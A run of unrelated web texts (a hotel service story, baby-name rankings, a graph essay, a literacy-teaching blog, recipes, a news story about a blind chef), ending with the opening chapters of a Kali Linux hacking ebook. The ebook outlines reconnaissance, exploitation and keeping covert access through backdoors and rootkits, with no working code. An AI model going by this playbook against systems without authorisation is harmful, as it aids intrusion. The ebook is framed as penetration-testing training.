- It’s hard to remember where you left your glasses when you can’t see them. Trisha, who is fairly new to our team, was cleaning one of our rooms in the Main building when the guest returned looking for his glasses, he admitted that he could not see very well without them and was fairly sure that he had placed them on the bedside table. She assisted the guest and found his glasses behind the table, she retrieved them and polished them off before returning them to the guest. The guest was delighted and happy to be able to see his surroundings once again.
“If we keep doing what we’re doing, we’re going to keep getting what we’re getting.” – Stephen Covey
Thank you for letting us share this week’s service stories with you. Each week we hope our little differences help bring a smile to your face – remember, service is not dead. It just took a vacation to Maine! | https://www.meadowmere.com/2012/11/13/servicestories-october292012/ |
The list shows few dramatic changes from 2017. The top five names for girls are identical, with Emma in the lead for the fifth year in a row, followed by Olivia, Ava, Isabella and Sophia.
However, Charlotte overtook Mia for the No. 6 spot. Harper entered the top 10 for the first time ever, taking the No. 9 spot and bumping Abigail off the list and Evelyn down to No. 10.
For the second year in a row, Liam is the top name for boys, followed by Noah, William and James. Lucas entered the top 10 for the first time, pushing Jacob off the list. Oliver has risen to No. 5, while Logan fell from No. 5 to last. Mason fell from No. 7 to No. 9, and Elijah jumped up from No. 7 to No. 8.
The SSA compiled the annual list based on the names that parents in the U.S. gave their babies born in 2018.
Without further ado, here are the top 10 girls’ and boys’ names of 2018. | |
The bar graph depicts the popularity of celebrities by showing the number of influencers in millions in the year 2018 and 2021.
Overall, the number of Instagram followers were around 100 millions for all the popular personalities and sharply increased for each one in the year 2021.
In 2018, Selena Gomez had the highest number of followers with a total of approximately 125 millions. On the other hand, The Rock and Kylie Jenner had the lowest number that is nearly 90 million followers. Cristiano Ronaldo and Ariana Grande had almost same number of followers in 2018 that is about 110 million.
The number of followers in 2021 had increased tremendously for Cristiano Ronaldo with the highest of approximately 310 millions followers. The lowest in the trend was Selena Gomez with almost 240 million followers. All the other influencers show the same digit that is 250 million.
The bar graph clearly shows that each celebrities popularity had increased at a very high pace since 2018 that they have touched or are near 250 million in 2021 and the exception over here is Criastiano Ronaldo whose popularity had beaten all records and gone above 300 million followers on Instagram. | https://nationalinstituteoflanguage.in/forums/reply/92117/ |
by C. Elkins, OK Math and Reading Lady
This is part 3 in my series about Guided Reading and Literacy Learning Stations. In Part 2 I focused on creating a classroom community and making preparations for stations by going over procedures in depth – introducing 1 or 2 at a time.
Today I will focus on two other steps: 1) Deciding on what types of stations would be beneficial, and 2) Deciding on how you will be grouping your students for small group teacher instruction.
Stations should:
- Be differentiated and engaging to allow for different abilities and learning styles.
- Have signs and anchor charts for each one. The anchor charts serve a dual purpose: To introduce your expectations of their behavior and procedures for the station, and to remind students while actually working at the station.
- Address the 5 areas of literacy: Phonemic Awareness (K-2), Phonics, Vocabulary, Comprehension, and Fluency.
Click on the link for my list of Literacy Stations Ideas. While I always advise teachers to start easy and begin with activities that require little preparation (listening center, smartboard, boxed activities, computer station), I hope you will gradually work toward more rigorous, differentiated activities that suit the learning needs of your students.
One station I think is critical is a silent reading / library / magic carpet reading center. Students need to practice the strategies you have been teaching. Here are my suggestions on having an organized classroom library.
- Organize books in baskets by topic, author, and/or level. Young students are not very good about putting books on shelves like in a school or public library, so baskets provide a good structure. It also helps students know where to return a book. Label each basket with the topic (and clip art picture for PreK, KG, 1st) such as: friends, fairy tales, plants, dogs, machines, fish, Clifford, Dr. Seuss, poetry, riddles, insects. Some baskets should have books by level (sorted by Fountas and Pinnell guided reading letters or AR levels).
- A basket for familiar books is also essential (whether it is ones read by the teacher, or by students in guided reading). You want students to enjoy books, but if all they are doing is looking at pictures they are missing the chance to gain confidence and fluency provided by reading familiar books.
- Provide comfortable seating at this station (carpet squares, bean bag, big pillows). If you don’t have room for seating like this, then try placing a basket of books at each group of desks. Rotate the basket each day. When students are finished with work, they have a selection of books at their disposal without having to leave their seats!
- Teach children how to select a book that is right for them (see Daily 5), how to silent read, how to look for words they know, how to partner read, how to take care of the book, how to put it back in the basket.
- Some of your baskets could hold both fiction and non-fiction books on the same topic (such as plants, ocean, weather). This will help when you are studying that topic in social studies or science.
Another critical station can address both phonics and vocabulary. Word work is important and your station provides the perfect opportunity to practice skills you have taught in whole or small group – and to provide varied levels of the same skill for different students. This can be done via matching, sorting or game formats using letter tiles or magnets, word cards, pocket charts, white boards, and metal trays. Be careful not to just let this be a spelling practice station.
Grouping Students
There are different methods for grouping students for your small group instruction.
- By strategy need: Students are grouped with others who need help with the same skill. (such as hearing onsets-rimes, breaking words apart, letter names, letter-sound correspondence, cvc work, vowel pairs, comprehension skills, and more — often using Literacy First or DIBELS data).
- By instructional level: Use data from Running Records or other assessments to determine students ability to accurately read text. Text reading accuracy of 95-100% indicates an independent level; 90-04% indicates instructional level; and below 90% indicates frustration level text. Think about it in this way: If a child is missing more than 10% of the words, then it is considered too hard — there are too many challenges making it frustrating. If the child is missing less than 5% of the words, then it is considered too easy. But between 5 and 10% means there are some strategies a child is missing, but not so many to be overly challenging or hard. It must be “just right.” This is my preferred method for grouping KG-2nd grade (and maybe 3rd grade) students because it enables me to work on strategies for text reading as well as word work and writing – all within the context of a book.
- For intermediate students, you may want to group students by book interest to form Literature Circles. Interest to read a particular book can be a strong motivator to read, no matter their apparent ability. The teacher would provide multiple copies of 4-5 different books. Students sign up for the book they want to read (1st and 2nd choice) and form the groups that way. The focus each meeting is more driven by comprehension, word analysis, and critical thinking strategies.
What is the ideal size of your small group? Actually, no more than 4. This might mean you have to form more than 5-6 groups to accommodate all of the students in your class. This calls for creative scheduling – but always make it a point to work with your lowest on a daily basis. Your higher students could meet with you 2-3 times weekly, while doing some independent work on the other days. If you have an adult paraprofessional / tutor / volunteer available, they can help with monitoring stations such as word work and familiar reading, or hosting a small group.
The assessment needed to determine grouping (for options 1 and 2) will take place within your first 6 weeks of school. Refer to my handout: Guided Reading: The first 6 weeks of school which summarizes most of the talking points in this blog.
Next: Different types of rotations systems for literacy stations — the pros and cons of each. | https://cindyelkins.edublogs.org/2017/01/28/guided-reading-and-literacy-learning-stations-part-3/ |
There are no hard rules that you should follow when making a seafood menu. But there is plenty of debate on which meals should be part of these menus. The amount and type of fish that you should include in each dish and how you should prepare the foods can vary. Besides, the bottom line is that you test with any dish and see it is tasty enough. If you are looking for the best dishes to include in your seafood menu, read on for some of the most delicious ones. You can try them.
Blackened Catfish Sandwich
This dish drives many people to the beach, so it might be a perfect dish to appear on your seafood menu. In the past, people considered this as extremely dirty fish, and that would scare many away. If you are still not at ease with this combination, you can go for any fish fillet and get excellent results.
However, that concern is no longer real. Most catfish are currently farm-raised. Taste them, and you will see that they have a great light flavor, which signifies how clean they presently are.
Make you dish little spicy by adding mayonnaise in the dressing as well as some few pieces of cabbage slaw and pineapple. If you can, make a cold beer to accompany this sandwich.
Crispy-Skin Salmon, Miso-Honey Sauce
If you want to include this dish in your seafood menu, follow the right procedure as well to cook it. For the best outcome, prepare it by combining one teaspoon of water, vinegar, whiskey ginger, honey, and miso in a small bowl. Then heat a dry small skillet, toast sesame seeds and toss it for about 2 minutes.
That is not all, you then need to lightly season salmon with salt and press it lightly on it to ensure all of its parts are fully dipped into the oil. Turn fillets over by using a spatula and when it is ready, remove the pan from the heat. Allow the food to continue being cooked with the residual heat left. Spoon the reversed sauce unto your plates.
Shrimp and Grits Dressing
Many regard this as a perfect Thanksgiving dinner. You can include it on your menu whenever you want to serve the shrimp-eaters in your family.
When you want to prepare it, start by preheating your oven to 325 degrees. Once it hits this temperature, put your chicken broth, salt, and red pepper to boil in a large saucepan. Reduce the heat and stir in butter. Once the liquid is adequately absorbed, just remove it from the heat.
Stir together eggs, red bell pepper, breadcrumbs, chopped green onions, and grated parmesan cheese in a large bowl. Add grits into the egg mixture and stir in shrimp. Finally, bake it at 325 degrees until the mixture is set. At this point, you can serve this meal as a seafood side dish.
Lemony Salmon and Spiced Chickpeas
It is no doubt that everything is better in bowl form. This general rule remains true with salmon dish flavored with garlicky. When you want to prepare this delicious seafood, preheat the oven at 300 degrees. Then toss lemon slices with a drizzle of oil. After that, arrange slices on your rimmed baking sheet and carefully place the salmon on the lemons. After about 15 minutes, let the salmon cool.
Take a short break as the cooling continues and the return to flake it into medium-sized pieces. Prepare your skillet and transfer the chickpeas to another bowl. For a perfect taste, whisk the lemon juice into the oil that you left behind and season it with more kosher salt. Once you complete the entire process, sprinkle your meal with sea salt and pepper. Again, after doing all this, you can be happy about preparing another dish that you can add to your menu.
The Bottom Line
There are plenty of kinds of seafood, and you are at liberty to choose the ones that best suit your unique needs. However, here, we have presented to you some of the most common and tasty alternatives for you to consider. As you can see, we have taken time to explain to you in detail what you can do to prepare each of these dishes. As such, at this point, you are likely able to not only talk about these foods and the best seafood menus but also prepare them.
Remember, we have endeavored to avoid the overuse of spices. Too much is not good for your health. Do the same, and you will make a healthy seafood menu. | https://bdkrestaurant.com/dishes-that-will-improve-your-seafood-menu/ |
MISSION VIEJO, Calif. — Fabian is a chef who lost sight in both his eyes during the pandemic, resulting in his losing everything else.
“I lost my house, my car, my bank account. I was living on the street for almost two months,” said Fabian, who requested that we use only his first name due to his immigration status.
In order to find his way, Fabian had to depend on the kindness of strangers.
“I’m the type of person who likes to do everything by myself. I don’t want to bother anybody, but I started to ask for everybody’s help. I asked for help to take me to the bathroom and help with everything. Sometimes I felt tired and thought, what’s the point of my life?” said Fabian.
Fabian is an undocumented immigrant. He was taking care of his mother in their apartment when he lost his job as a chef at a restaurant in Newport Beach. Fabian explained how it was the start of the pandemic when the hospitality industry took a hit.
Losing his job also meant losing his health insurance through work that he paid into for years. He could no longer afford his diabetes medication as he developed cataracts in both eyes. His condition left him blind and homeless.
Without much hope left, Fabian called Serve the People Community Health Center, a one-stop shop for health care services to patients in Santa Ana. Sam Hahn, the clinic’s vision services manager, picked up the phone.
"It’s like, oh my gosh, we can’t send him back on the street. I don’t know if we’ll see him again. I don’t know what will happen to him in a week," said Hahn.
Serve the People is a federally qualified clinic that provides extensive health care services for Orange County’s at-risk population. While it provides medical care, oral health, dental care, vision care and behavioral health services, surgeries aren’t within the scope of what it can provide.
Determined to prevent Fabian from continuing to live on the streets in his condition, Hahn and his team helped Fabian apply for emergency MediCal. However, the provider does not consider cataract surgery to be an emergency situation. Fabian also wasn't in a position to pay for cataract surgeries for both eyes, which can cost upwards of $5,000 per eye.
While Hahn worked on finding Fabian a doctor to treat his eyes, he called City Net, which is a team that works with the county of Orange and individual cities within the county, to help Fabian get off the streets. Reeny Burgula, a lead case manager with City Net, helped Fabian secure a bed at the Tustin Emergency Shelter. Finding a shelter that would take Fabian while he was unable to see was a difficult process.
"He wasn’t able to see even a little bit," said Burgula. "When we were loading him into the van to take him over the shelter, Diana and I stood on both sides of him, and he grabbed our arms, and we literally had to walk him over to the car, open the car door and load him in van."
Prior to securing a bed in the shelter for Fabian, Hahn reached out to the owner of California Suite Lodge who allowed Fabian to stay there for free. Hahn connected with Dr. Faris Ghosheh who has been partnering with Serve the People to provide free surgeries for patients. Dr. Ghosheh agreed to donate two cataract surgeries to Fabian. Dr. Ghosheh also got his surgery center at Providence Mission Hospital Mission Viejo to donate the surgery space and team.
“We just did his eye a couple weeks ago. He’s just thrilled. It’s an honor to make that kind of difference in people’s lives,” said Dr. Ghosheh, who added that his surgery center is the only facility in Orange County to donate such services to people in need.
Hahn noted that Dr. Paul Prendiville is another ophthalmologist who has been very generous in granting free surgeries to needy patients.
Fabian has now undergone surgeries for both of his eyes.
"I feel like I’m invincible," he said. "All my problems, I don’t see more problems. I see solutions and I have so much energy to get back to work."
Fabian added that he felt so alone when he was legally blind and thought he’d never see again. On top gaining his sight back, Fabian said he also gained an appreciation for people who did everything they can to help him get back on his feet.
Fabian is currently working part-time washing cars but is hopeful he can work hard to save up money to purchase a food truck. For more information on Serve the People, visit here. | https://spectrumnews1.com/ca/orange-county/human-interest/2021/04/27/collaborative-effort-launched-to-help-chef-regain-his-vision-and-independence |
Hacking
The Ultimate Hacking Guide
An In-Depth Guide Into The Essentials Of Hacking With Kali Linux
© The Code Academy 2017. All rights reserved.
This book is provided as a learning guide for education purposes only. The Code Academy will not be held responsible for any activities and or proceedings related to the materials contained in this book.
This book contains information and material that is potentially dangerous or destructive. The Code Academy will not be held liable for any losses, damages, or unlawful actions that result from the misuse or misinterpretation of the information in this book.
The reader is advised to refer to the laws and acts in their country/region/territory/province/state to be sure not to violate any existing laws before referring to the content of this book. The term ‘hacking’ or ‘hack’ referenced throughout the book refers to legal or ethical hacking and do not refer to unlawful penetration of a computer or network system, otherwise referred to as ‘blackhat hacking’.
Table of
Legal Disclaimer:
Your feedback
1. Introduction to Whitehat Hacking
1.1 About The Code Academy
1.2 What is Kali Linux?
1.3 Why Kali Linux?
1.4 How you should get started
2. Setting up a Wireless Lab
2.1 Hardware and Software Requirements
2.2 Installing Kali Linux
2.3 Setting up the access point
3. The Penetration Testing Life Cycle
3.1 Introduction to the Penetration Life cycle
3.2 Phase 1: Reconnaissance
3.3 Phase 2: Scanning
3.4 Phase 3: Exploitation
3.5 Phase 4: Escalating privileges and maintaining access
3.6 Phase 5: Reporting
Summary
4. Phase 1: Reconnaissance (2500)
4.1 theHarvester
4.2 Googling, doxing, and using Metagoofil to build a target list
4.3 Gathering information with DMitry (Deepmagic information gathering tool)
4.4 Other notable information Gathering Tools in Kali Linux
4.5 Summary
5. Phase 2: Scanning with Kali Linux Tools
5.1 NMAP
5.2 Nessus
5.3 Metasploit
6. Phase 3: Exploitation
6.1 Attack Vectors and Attack Types
6.2 Exploiting Vulnerabilities with Metasploit
6.3 Launching an attack
6.4 Shell Management with Meterpreter
6.5 Web Server and Application Exploitation
6.6 Exploiting Web Servers with Nikto
6.7 Exploiting a browser vulnerability with BeEF
7. Phase 4: Maintaining Access
7.1 Using malware maintain access to a compromised system
7.2 Backdoor with Metasploit
7.3 Encoded Trojan Horse
7.4 Spyware (Metasploit listener)
7.5 Keylogger
7.6 Remote Communications
8. Phase 5: Reporting
8.1 Structure of a pentest report
8.2 Presentation and evidence storage
8.3 Dradis reporting tool
8.4 Metagoofil reporting tool
9. Conclusion
# Legal Disclaimer:
This book is copyright protected. This is only for personal use. You cannot amend, distribute, sell, use, quote or paraphrase any part or the content within this book without the consent of the author or copyright owner. Legal action will be pursued if this is breached.
Please note the information contained within this document is for educational and entertainment purposes only. Every attempt has been made to provide accurate, up to date and reliable, complete information. No warranties of any kind are expressed or implied. Readers acknowledge that the author is not engaging in the rendering of legal, financial, medical or professional advice.
By reading this document, the reader agrees that under no circumstances are we responsible for any losses, direct or indirect, which are incurred as a result of the use of information contained within this document, including, but not limited to, —errors, omissions or inaccuracies.
#
# Your feedback
We always welcome all forms of feedback from our readers. We would like to know what you think about this book, what you like and what you do not, and what helped you and what did not. Your feedback is important for us to create titles that will help you learn the coding and hacking skills you need to expand your career.
# 1. Introduction to Whitehat Hacking
This book is a second installment in a beginners learner series, which started with An In-Depth Guide Into The Essentials Of Python Programming. While the content of these books is designed for beginners, it can also be used by users of all levels, from first time learners through to wireless security experts and seasoned hackers. The book starts with simple hardware and software setup but then moves on to explain simple hacking tricks and more complicated penetration testing practices.
All attacks are explained using practical step-by-step demonstrations, making it very easy for beginners and seasoned experts alike to quickly try them and understand how and why they get the results they expect. Please note that even though the book highlights the different vulnerability attacks which can be launched against wireless networks and computer systems, the real purpose is to educate the user to become a proficient wireless penetration tester or pentester.
A proficient penetration tester would understand all the potential attacks and vulnerabilities of a target computer or network system out there and must be able to demonstrate them, with ease, should a client make requested.
## 1.1 About The Code Academy
The future of humanity is defined by the code we write now. That is what we at The Code Academy believe. Our organization was founded on the desire to produce high quality yet simply illustrated and concise learning materials that will help beginners enter into the world of programming by ‘learning through doing’. The Ultimate Hacking Guide is one of the several eBooks our dedicated team of experienced computer and information security experts and programmers have planned to make available for complete beginners like you.
Whether you are a complete newbie to hacking, have experience with hacking using tools that come with Kali Linux as a hobby, or you wish to go pro someday, you have chosen the right book. We believe that most learning instructions on the internet and in published books do not use the right approach, which is to show the learner how to do it first, and after they grasp the how, explain the why.
The Code Academy is passionate about writing code and we believe that in time, everyone will be able to contribute towards the future of humanity by learning to write computer programs as well as protect their information from malicious individuals. Besides this eBook, we also have the Python Programming eBook ready for print. To become a proficient hacker and Python programmer, be sure to check out this eBook.
## 1.2 What is Kali Linux?
A plumber keeps all his essential tools in one toolbox. In the same way, a hacker needs all the essential penetration and testing tools in one place, and one company, called Offensive Security Ltd, has made that easy with their Debian-based Linux OS distribution.
Kali Linux is specifically designed for computer information security tasks including security research, computer forensics, reverse engineering, and penetration testing. It is a complete top-to-bottom rebuild that adheres to the Debian development standard and can be installed as a stand-alone operating system. Some of its features include:
* It comes with over 600 essential penetration tools included.
* It has wide-ranging wireless device support.
* It adheres to the File System Hierachy standard (FSH).
* Has a custom kernel patched for injection.
* Kali is completely customizable.
As you invest time, effort, and money in becoming a penetration testing professional, it is important that you first take the time to learn how the Linux operating system works and get familiar with its basic operations and processes. You will learn to use Kali Linux faster and better when you are familiar with the Linux (Debian) operating system.
## 1.3 Why Kali Linux?
It is much easier to execute hacks when you have Kali Linux installed on your computer because you have all the tools you need in one place. There are many others you can download and install when you need them, but you can rest easy knowing that all the basics come with the standard version of Kali Linux. However, to make these tools work for you, it is going to take some time and a lot of effort.
There is a big problem most beginners to hacking have, subtly dubbed the Hollywood hacker problem. Many beginners dive into the world of wireless hacking with magical expectations bordering miracles. They want a tool that appears on the first page of Google search results and downloads and installs easily with one click. They expect it to be easy to use on a Windows computer and can hack Facebook, Gmail, and the neighbor’s Wi-Fi at the click of a button. Unfortunately, such a tool does not exist.
To become a competent ethical hacker, consider hacking as a form of art that takes hours of focused learning and demands years of practice to master. You are on the right track to getting started, with such a simplified manual to walk you through the first steps, you will be able to execute basic hacks in no time and more importantly, understand how they happen.
Whether you are a beginner to hacking, even if you have no programming or computer networking experience, this book will lay the foundation necessary to turn you into a professional ethical hacker.
## 1.4 How you should get started
There are a few things you need to do, especially if you are a complete beginner, to make your learning easier.
1. If you are clueless what Kali Linux is, or have not used a Linux operating system before, put some effort in learning about the Debian Linux platform first. You should also read the official documentations on Kali Linux.
2. This book provides all the information to get started, but it will pay off to do more research on blogs and YouTube. Watch the tutorials and read the guides and illustrations published by others to familiarize yourself with what you are just about to start learning.
3. Learn to use the Linux command line interface. Some hacks will be executed using tools with graphical user interface, but most involve using exploits that you can only interface with the command line. You can start here: http://linuxcommand.org/
# 2. Setting up a Wireless Lab
Preparation is key if you are looking forward to becoming a proficient ethical hacker. This is particularly important at this stage when you are just getting started with penetration testing as you set up an environment to learn and test your penetration skills. You will always have a limited amount of time to carry out reconnaissance, network testing, testing exploits, and maintaining access to a hacked system. Therefore, you must learn to prepare well because every test you conduct will be different in nature and will require that you come up with the appropriate and oftentimes unique approach.
Tools play a critical role in preparation to learn to hack and to carry out the actual hack. In this chapter, you will learn:
* The hardware and software requirements to set up and use Kali tools.
* Installing Kali Linux.
* Setting up and configuring an access point.
## 2.1 Hardware and Software Requirements
Considering that you are learning to become a hacker, it is justifiable to assume that setting up a program or configuring a hardware device on a computer is nothing new to you.
Installing the Kali Linux operating system, whether as the primary OS on your laptop or in a virtual box in another operating system such as Microsoft’s Windows 10, Apple’s OSX, or another Linux operating system, should be a second nature to you.
However, we recognize that everyone could use a refresher every now and then, and that is why we start with the basics in this book.
2.1.1 Hardware requirements
You will need the following hardware to set up a wireless penetration lab to use in this course:
A Wi-Fi enabled laptop or two: This course is mostly about wireless penetration testing. Therefore, you need a laptop with an in-built Wi-Fi card that will run Kali Linux, and if possible, another one to try your penetration testing on. While almost any modern laptop will work, in this case, systems with minimum 2GB RAM would work well. If you could find two laptops with 4GB RAM or more your lab would be ideal.
External wireless adapter (optional): There are wireless cards that support packet sniffing and packet injection supported by Kali Linux that are sold online for cheap. You do not need to have one but you would learn better if you had a card from Alfa Networks or Edimax sold for under $20 on eBay.
An access point: An access point that supports the standard WEP/WPA/WPA2 encryption modes would be great for testing purposes.
An internet connection: Throughout this book, references will be made to online sites and you may need to download software and do further research online. A good internet connection is a prerequisite for smooth learning.
An internet connection: You must be connected to the internet to download the software, carry out some tests, and perform your own research.
2.1.2 Software requirements
One or both your laptops should have the right software to install Kali Linux.
Windows: 7 or 10
Linux OS: Any distribution of that supports VirtualBox
Linux Kali: You will download this from the official Kali website http://www.kali.org/ Kali Linux is an open source software which means you will be able to download it and use for free.
## 2.2 Installing Kali Linux
This section will guide you on how to install Kali Linux and get it running. Note that you will install the software on your primary or tester machine.
Installing Kali Linux is relatively simple. The thing you need to do is to download the correct version of the operating system from the official Kali website. It is recommended that you first go through the official Kali documentation on its official website http://www.kali.org/officialdocumentation/.
2.2.1: Download the software you need
Go to http://www.kali.org/downloads/. On this page you will see the links to the downloads of all available Kali versions including 64 and 32 bit light and standard versions. Choose the right version of Linux based on your software environment and download the ISO file to your computer. Be sure that you choose the right version of Kali Linux.
.2.2.2. Install
When download is complete, the next step is to install the operating system on your laptop. You can install Kali Linux on your hard disk as the primary operating system, you can dual boot it with your current Windows or Mac operating system, or you can install it on a removable disk. Considering that you have two laptops dedicated to this course, this guide will help you install Kali Linux as the primary operating system in one of them.
2.2.3. Burn the Kali ISO file on to a bootable DVD or make a bootable flash drive
Next, make a bootable DVD with the Kali ISO or if you prefer, make a bootable flash drive to be able to install the operating system from boot. There are many tools you can download online that will help you do this. Examples are Rufus, Windows 7 USB/DVD Download Tool, RMPrepUSB, and WinSetupFromUSB.
Once the bootable DVD disk or flash drive is ready, insert into the computer to set up Kali Linux and ensure that the boot sequence in the BIOS setup is configured to removable (or USB) media first, not the hard disk first. Select the option to boot from the drive you inserted if prompted. If the boot is successful, you should see a retro screen that looks like this to begin setup:
The installation process of Kali Linux is a lot like that of any other GUI-based Linux system and should be simple and straightforward to follow. Select the appropriate options in every screen through the installation process and when it is done, restart the computer as prompted and remove the setup DVD or flash drive.
2.2.4. Security during installation
Kali Linux comes preinstalled with a plethora of very powerful tools that can possibly be used for good and for bad. The network testing and penetration tools included in the operating system can destroy computers and network systems, and if used unethically, can lead to actions that can be perceived as unlawful or criminal. Sometimes it is difficult to tell the good guys from the bad guys.
As such, it is important that you protect your computer with a strong password. While setting a password is only the most basic security practice, many people overlook its importance and end up leaving their own systems vulnerable to tampering. When prompted during Kali Linux installation, be sure to set up a strong boot up password.
2.2.5. Installing Kali on VirtualBox or VMware
If you have only one computer and wish to run Kali Linux within a virtualization software, VirtualBox and VMware come highly recommended. The installation process of Kali on both these virtualization software is pretty much the same, except for the pre-setup process, which involves loading the Kali Linux ISO image on to the virtual space. You can download VirtualBox from http://www.virtualbox.org and VMware Player from http://www.vmware.com/products/player/playerpro-evaluation.html
Installing Kali Linux on VMware Player
## 2.3 Setting up the access point
When your laptop is up and running Kali OS, the next step will be to set up the access point. As we mentioned earlier on, you can use your current router if you have one or get one that supports WEP, WPA and WPA2 Encryption schemes. The basic principles and usage of all routers are basically the same. These steps should help you set up the wireless router in your lab.
Step 1: Power on your access point and connect it to your primary laptop using an Ethernet cable.
Step 2: Open the browser on your computer and enter the IP address of the access point terminal on the address bar. The default IP address is often imprinted on the access point and could be something like 192.168.0.1. If you have changed the access point address before, be sure to enter the correct numbers.
Once connected to the access point, you should see a configuration page that looks like this:
Step 3: Find the setting that is related to configuring a new SSID and change it to Wireless Lab or something relevant then save the change. This setting is typically under Wireless or Wireless Security settings option.
Step 4: Still under Wireless Security setting, find and change the Disable Security option. What this does is change the security of your network to Open Authentication mode. Save the changes to the access point.
Note that depending on your router, you may have to reboot the device for changes to take effect. When the access point is properly configured, you should be able to see your new wireless network when you enable Wi-Fi on your laptop. It is important that you do not connect to the internet using the access point we just configured, for now, because anyone within range will be able to connect to it and access the internet.
In later chapters, we will get to re-configure the access point to use WEP and WPA configurations to illustrate attacks against them.
We are now ready to begin hacking!
# 3. The Penetration Testing Life Cycle
There are several different kinds of penetration life cycle models being used by hackers and information security professionals today. However, the most common is the life cycle and methodology that is defined and used by the EC-Council in the Certified Ethical Hacker program. It is a five-phased life cycle progress that involves reconnaissance, scanning, access testing, access maintenance, and covering tacks.
In this book, we will adopt a more simplified approach that is defined by Patrick Engebretson in the book “The Best of Hacking and Penetration Testing” which involves all the steps of EC-Council Certified Ethical Hacking life cycle but without the covering tracks phase and instead including reporting.
## 3.1 Introduction to the Penetration Life cycle
Most people assume that a hacker just needs to turn on the computer and begin typing obscure strings of code to magically access any computer or device on the planet in seconds. This Hollywood stereotype could not be further from the truth.
A professional hacker must be approach and plan his hacks meticulously to be able to find, uncover, and then exploit vulnerabilities in a computer system. Over time, the standard penetration testing life cycle has emerged as the most efficient framework to use. This standard lifecycle involves the exploitation of information systems such that its results can be properly documented in a report. This report provides the user with a structure to develop high-level plans for his penetration activities, each one building on the previous step and detailing information critical to the next step(s).
The penetration testing life-cycle
The penetration testing life cycle we will adopt for this beginners’ guide as introduced by Patrick Engebretson in the book “The Best of Hacking and Penetration Testing” has these five phases:
1. Reconnaissance
2. Scanning
3. Exploitation
4. Escalating privileges and maintaining access
5. Reporting.
The approach we have used to learn ethical hacking in this book splits the entire process into these five phases, and we will learn the right way to make use of each during hacking and the tools available on Kali Linux that you can use and how to use them.
In this way, the learner will not only learn to use Kali Linux, but also master the good practices and sequential steps to follow to increase the chances of success for every hacking they attempt in the future.
In this chapter, we will make a blanket introduction of these standardized phases of ethical hacking to give you an idea of how they work and how they relate to each other.
## 3.2 Phase 1: Reconnaissance
Why is it that in times of war, generals, analysts, and offices lay down the plans and maps of the hostile territory and scan and inspect it exhaustively while others keep tabs on the news while taking notes and others prepare reports of everything about the target? The obvious reason is that in a military campaign, reconnaissance is one of the most important steps that an army can use to choose who, where, and when to attack.
In the same way, when planning to attack or test the penetration of a computer system, as a hacker, you must do sufficient reconnaissance which involves focusing on and learning anything and everything about the network, computer, individual, or organization you are targeting. Most weaknesses in a computer system that a hacker takes advantage of are caused by human errors. Therefore, carrying out a reconnaissance is the best way to identify such things as documents, passwords jotted on sticky notes and discarded, IP addresses of computers, or even network SSIDs.
To learn how to do reconnaissance, we will use such tools as the Harvester that comes with Kali Linux. This is a handy tool that can be used to build email address lists based on a particular parameter.
Other popular tools we may touch on are DIG which is used to find the SMTP servers of the target, Google which comes in handy when doxing to create a list of targets and gather information about them from various sources, and Dmitry, a powerful tool you can use to find information and documents about a target organization.
You may find other tools such as Recon-ng and Maltego amazing reconnaissance tools too.
Note that the first step of penetration testing does not involve the actual penetration of a computer or network; instead, it involves finding identifying documents and as much information about the target as possible.
## 3.3 Phase 2: Scanning
As a hacker, picture yourself hidden crouched on a small bush deep behind enemy lines. It is your duty to check out the position and status of the enemy and relay the information back to camp to help in the war coordination. Your report will include such information as the movement and the routes of the enemy troops, their defense and attack weapons, among others.
Scanning, the second step of the penetration testing life cycle, is a lot like a soldier on a mission defined by the analysis information collected during the reconnaissance stage. The hacker uses information collected during the first stage to scan the network and target computer system for information.
Nmap is one of the top tools used in network scanning. As a beginner to hacking, you will quickly grow into this simple yet powerful tool that scans and detects live hosts on a network. You will be able to type simple commands to the terminal to ping and identify any active computers on the network. Other tools you can use in this phase of penetration hacking are Metasploit for stealthily scanning available ports and the popular Nessus Vulnerability scanner.
The tools used in the scanning phase give this process a better definition and will provide information that you will be able to use to exploit vulnerabilities in the system in the next phase.
## 3.4 Phase 3: Exploitation
Kali Linux comes with an impressive arsenal of tools specially developed to exploit vulnerabilities in a computer or a network system. These tools can also be used to generate scanning scripts and text files that we will talk about more later in the book.
The purpose of the exploitation phase is to gain access into the target system by taking advantage of the vulnerabilities found in the previous phases and get back out without being noticed. As a hacker, to consider an exploitation a success, you must reach a point where you can access the data or information protected by your client using proven techniques.
There are many tools that you will need to try to find exactly what you are looking for when attempting to exploit a computer network. What makes an efficient ethical hacker in the Computer and Information Security industry is how well they know how to choose the tools to use based on their experience with them and the demands of a specific exploit situation.
## 3.5 Phase 4: Escalating privileges and maintaining access
If you break into a person’s home without them knowing, and you wish to return at a later time to ‘browse’ isn’t it more advisable to tamper with the backdoor lock or leave a window open so you will not need to pick the lock next time?
In this penetration life cycle standard, you will learn how to maintain access to a computer or network system you compromise by building a web backdoor or using a rootkit. This will be an undetectable entry into the system that will provide easier and faster access for when you need to break into a homeowner’s safe after hacking the house door.
## 3.6 Phase 5: Reporting
Generating comprehensive and revealing reports of the steps you take during penetration testing are very important for an ethical hacker. Blackhat hackers end their hacking missions at the point where they can return to the system, but the good guys must have a report for the client whose system was the target.
Each step taken during the exploitation process - from reconnaissance to building in rootkits and backdoors must be explained in the report. The tools used in this phase will help you detail the hacking process, the vulnerabilities discovered and which ones were exploited, and the compromised and ‘at risk’ systems.
Note that if you intend to be an ethical hacker professionally, you may need to learn how to capture logs and reports from all the tools used in the four phases and compile them to make them easy to explain to senior leaders and the technical staff of the target.
## Summary
In the following chapters, we are going to look deeper into these five phases of the penetration life cycle and which tools you can use to achieve the objectives of each of them. The format of presentation of the tools used and the content explaining them will help you understand better the purpose and the benefits of each of the phases and the Kali Linux tools in use.
# 4. Phase 1: Reconnaissance (2500)
We already learned in the previous chapter that proper information gathering is necessary to make a penetration test successful and to ensure that the client gets the maximum benefits of the service. A hacking sessions begins with the testing team finding as much information about the target as possible. Most clients provide little information about the network system but proper reconnaissance can be leveraged to uncover specific and detailed information about the organization and/or its people and even IP addresses and technologies they use.
The objective of reconnaissance is to dig up valuable information about the target including:
* The structure of the organization including high level administration, departments, teams, and organizational charts.
* The information infrastructure of the target including network topology in use and the IP space.
* Hardware and software platforms and packages used by the organization.
* Organizational partners, employee names, phone numbers, and email addresses, and registered sub-domains.
* Physical locations of the organization’s information facilities.
In this chapter, we are going to focus on three information gathering tools available on Kali Linux:
## 4.1 theHarvester
